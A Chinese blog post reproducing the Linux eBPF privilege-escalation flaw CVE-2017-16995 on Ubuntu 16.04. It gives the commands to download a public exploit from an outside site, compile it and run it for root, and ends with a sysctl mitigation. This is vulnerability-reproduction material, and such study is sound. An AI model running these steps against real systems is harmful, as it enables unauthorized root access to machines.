CVE-2017-16995 Ubuntu16.04本地提权漏洞复现

超、凢脫俗 2024-04-07 11:02 145阅读 0赞

0x01 前言

该漏洞由Google project zero发现。据悉,该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。

0x02**漏洞影响**

Linux Kernel Version 4.14-4.4(影响Debian和Ubuntu发行版)

0x03 测试环境

ubuntu16.04 x64

0x04 测试步骤

1.提权exp下载地址:

http://cyseclabs.com/exploits/upstream44.c

2.cd切换到/opt目录下并下载exp:

cd /opt #前提看/opt是不是777权限,不然编译和执行不了exp

wget http://cyseclabs.com/exploits/upstream44.c

92155b63fb31134b6dd4a26eded75c72.jpeg

3.有的ubuntu没有安装gcc需要执行安装:

sudo apt-get install gcc

如果缺少一些编译组件,则需要安装lib插件

apt-get install libc6-dev

4.然后利用gcc进行编译

gcc -o exp upstream44.c

6fbcc853257f01eba6dffa42c0bf1ca4.jpeg

5.将exp进行更改为可执行权限

chmod +x exp

5f1f38dfdca847be28a162d514dd5da4.jpeg

6.运行exp进行提权

./exp

3a23be270235a84c54fc0105845168f4.jpeg

622036cef05b9adec0933f9d1a8cc955.jpeg

0x05 漏洞修复

目前暂未有明确的补丁升级方案。 临时建议用户在评估风险后,通过修改内核参数限制普通用户使用bpf(2)系统调用:

echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled

发表评论

表情:
评论列表 (有 0 条评论,145人围观)

还没有评论,来说两句吧...

相关阅读